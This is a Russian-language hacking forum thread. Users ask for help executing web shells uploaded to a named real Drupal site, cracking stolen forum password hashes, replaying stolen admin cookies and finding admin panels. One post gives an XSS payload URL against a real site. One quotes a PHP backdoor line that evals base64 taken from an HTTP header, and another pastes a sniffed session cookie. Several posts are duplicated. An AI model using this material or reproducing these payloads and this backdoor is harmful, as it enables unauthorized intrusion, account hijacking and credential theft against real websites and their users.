Google рулит 1 (http://www.2baksa.netwww.2baksa.net/news/5311/) 2 (http://dumpz.ru/showthread.php?p=313982) 3 (http://www.google.ru/search?hl=ru&q=%22vBulletin+3.5.3%22+%F1%EA%E0%F7%E0%F2%FC&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=) =))

Google рулит 1 (http://www.2baksa.netwww.2baksa.net/news/5311/) 2 (http://dumpz.ru/showthread.php?p=313982) 3 (http://www.google.ru/search?hl=ru&q=%22vBulletin+3.5.3%22+%F1%EA%E0%F7%E0%F2%FC&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=) =))
)))) вот именно, что все ссылки либо битые, либо вообще какая-то гадость, но никак не 3.5.3

Народ можна на smf бд слить через админку ?

Имеется форум Invasion Power Board 2.3.5 , необходимо отредактировать дату написанного сообщения на форуме, она хранится в таблице ibf_posts в поле post_date, но там она представлена в странном виде, как отредактировать дату ?

Есть форум на пхпбб, версия как на торрентс ру, те не 3. Есть какие нибудь утилиты для спама на форуме?

у меня тут вопросик один..в гугле искал но так норм объяснения и не нашел.
А вопрос такой:Как эффективно и 100%-но найти админку на сайте?
софты нужны может какие нить?обьясните плиз поподробней! :)

Здравствуйте всем, у меня возникла проблема

Имеется сайт http://jmktour.net/drupal/ на который я смог залить шелл, точнее несколько шеллов (с ontechad.by.ru и одного японского ресурса http://ja.pastebin.ca/1486624 )

шеллы заливал через админку
не спрашивайте меня, как я получил пароли к админке сайта - это очень долго

сайт стоит на последнем drupal

шеллы лежат тут
первый (http://jmktour.net/drupal/sites/default/files/u4/antichat.php.e)
второй (http://jmktour.net/drupal/sites/default/files/u4/485_picures.e)

в админке разрешил загрузку php
гружу файл .. система сообщает, что из соображений безопасности мой php был переименован в txt

запретил txt -система начала ругаться сама на себя, но всё равно php не пропустила

пробовал с .htaccess (для регистрации «addtype application/x-httpd-php gif»), но система и ему переименовала

пробовал изменять расшерение файла на "php.e", думал он интерпретирован как php-скрипт, но система его не исполняет, а предлагает на скачку ..

помогите разобраться с проблемой, как исполнить шелл ?

Сразу сори за тупой вопрос, но я в этой теме новичек =)) Вобщем суть дела такова......кинули мне ссыль на какой то ф-л, естественно расписаный как супер-пупер фигня какаято. Ну я, как примерный лох, пошел и содрал этот ф-л но пи этом забыл убрать автооткрывалку скачиваемых ф-лов =(( Теперь проблема - немогу зайти в контакт.......выдает абсолютно пустую страницу, а когда вручную ссылку на ид прописуеш, то говорит что такой страницы не существует =(( Что мне делать? Где искать эту долбаную штукенцию??? Искал в установленных прогах, в запущенных процессах ничего!

чтонибудб есть для пхпбб 3.04 3.05?
Сплоиты , уязвимости...

Думаю критических в паблике нет ...

как называется стандартная таблица с юзерами и админами в IPB 2.1.7??

Ломаются ли смс-замки типа http://swow.by/signup2.php ?
если да - ссылку на мануал plz

Как залить шел на mybb имея админку??? все мозга уничтожил (((
респкт обеспечен!!!

а чтонить есть на IPB 2.3.6?

как называется стандартная таблица с юзерами и админами в IPB 2.1.7??
качни эту версию и в сорцах глянь


SHiTS, создай перса на аккаунте Fuckel:1234
кажется, это уязвимая CP
когда создашь уведоми в ПМ
кросс сайтскриптинг на странице реги (http://swow.by/signup.php?refid=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E)

У меня вопрос : Возьмем пассивный КСС... (IPB 2.1.7)
Почему некоторыми куками нельзя воспользоваться? Например форум - подставил куки жертвы, выкидывает в Гости... Происходит только с группой администраторов и модераторов, с пользователями работает на ура. Тоесть при подставлении украденных куков юзера я могу под ним сидеть, администратор и модератор - нет. Учитывая что инфо которая идет на сниффер абсолютно правдивая.

У меня вопрос : Возьмем пассивный КСС... (IPB 2.1.7)
Почему некоторыми куками нельзя воспользоваться? Например форум - подставил куки жертвы, выкидывает в Гости... Происходит только с группой администраторов и модераторов, с пользователями работает на ура. Тоесть при подставлении украденных куков юзера я могу под ним сидеть, администратор и модератор - нет. Учитывая что инфо которая идет на сниффер абсолютно правдивая.
Может быть привязка к IP?
Там же защита неплохая в IPB

Может быть привязка к IP?
Там же защита неплохая в IPB


не может быть а так и есть , так что только расшифровывать хеши остается

Скорее всего привязка, но я не думал что модерам тоже ставят ))) А хеши расшифровать пробовал, пока ничего не вышло... Скорее всего стоит какой то закадычный метод шифрования. У меня снифф тащит только pass_hash, а говорят для расшифровки на IPB 2.1.7 нужна соль, как ее вытащить я незнаю. Может подскажите ? Ладно спасибо за ответы.

Подскажите в чем проблемма, выдает только первый символ хэша....
форум: phpBB 3. ...
сплойт: phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
после выдачи первого символа вылетает...
причем при след. попытке выдает другой символ - это онг показывает следующий что ли?

подскажите как залить шелл в DLE 7.0 имея права главного редактора

Скорее всего привязка, но я не думал что модерам тоже ставят ))) А хеши расшифровать пробовал, пока ничего не вышло... Скорее всего стоит какой то закадычный метод шифрования. У меня снифф тащит только pass_hash, а говорят для расшифровки на IPB 2.1.7 нужна соль, как ее вытащить я незнаю. Может подскажите ? Ладно спасибо за ответы.

соль через XSS не добудеш

Подскажите в чем проблемма, выдает только первый символ хэша....
форум: phpBB 3. ...
сплойт: phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
после выдачи первого символа вылетает...
причем при след. попытке выдает другой символ - это онг показывает следующий что ли?

думаю что форум просто как то пропатчен

Еще вопрос , если нашли дыру в XSS , есть ли возможность найти еще оную? Если да, то есть ли про люди с которыми можно на эту тему переговорить ?

Привет всем. Я новичок во всем этом деле. Но вот AdMiN с ployka.at.ua прислал меня к вам. У меня есть вопрос. А как можно просмотреть закрытую от обычных пользователей тему на форуме? То есть Бункер, Модераторская и т.д. То что простым смертным смотреть нельзя.

Привет всем. Я новичок во всем этом деле. Но вот AdMiN с ployka.at.ua прислал меня к вам. У меня есть вопрос. А как можно просмотреть закрытую от обычных пользователей тему на форуме? То есть Бункер, Модераторская и т.д. То что простым смертным смотреть нельзя.

рекламко?

можно посмотреть если есть права

five5feer Нет не реклама. Я действительно хочу как то посмотреть про что они там болтают. Пробовал угнать сайт teleportpro. Но ни одной страницы форума не скачала.
Что? Выходит никак? Без взлома? Модером там стать не реально.

Самый лучший способ знать всё - поиметь админку (в хорошем смысле) :-D
Про то как стырить и расшифровать хеш админки - другой раздел форума ;)

Ребята, буду благодарен за совет. Взломали мой форум на phpbb3. Симптомы такие -он сам себя добавляет в пользователи, я запретил прикрепление файлов, а он добавляет картинку. В корне появилась куча файлов со странным расширением, но название сходны с оригинальными , типа зебра. Он сегодня ночью снова вернется. Как можно ему усложнить жизнь? Айпи меняет. Спасибо заранее

http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет ссылка на файл.
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?

http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет ссылка на файл.
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
А не проще это сделать всё руками? если алгоритм понятен?

Если бы все было бы ПОЛНОСТЬЮ понятно, то да %) Я не совсем, например, понял, что за шелл в архиве лежит...

if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }

Это случаем не он?

Парни подскажити как изменить дату регестрации на форуме?
мне на локалке нужно сделать это :)
Если кто реально поможет вознагразу 3 баксами.

нужен vBulletin версии 3.0.x
выложите кто-нибудь
в инете искал так и не нашёл, либо битая ссылка, либо нету сидеров
----------------------------------------------------------------------
уже найдено

Кто подгонет материал (темы) на получения прав главного модера на юкозе? (как куки стырить и т.д)

Меня интересует, можно-ли как-нибудь поднять себе репутацию на форуме версии vBulletin® Version 3.8.3 ? :(

Подскажите пожалуйста как узнать пути до панели администратора в vBulletin? :)

подскажите вот слышал о внедрении javascript в BMP рисунок, какой программой это можно сделать или какому правилу следовать пользуясь hex редактором ?

Вобщем проблемка такая, соснифил следущее:

session_id=a534e4ee349465d8932b52571006737d; modtids=,; forum_read=a:1:{i:7;i:1252358976;}; topicsread=a:1:{i:2;i:1252358990;}; member_id=5; pa ss_hash=c3e5d90d2478f52d9f0aff89e10f1c25; coppa=0; anonlogin=-1

Помогите разобратся нубу xD особенно интересует как разшифровать pa ss_hash (пробовал различные сервисы, онлайн по расшифровке хэшей и программы)

З.Ы. Интересует сам алгоритм собственно и как можно его разшифровать.

P.P.S. PasswordPro не помогает :)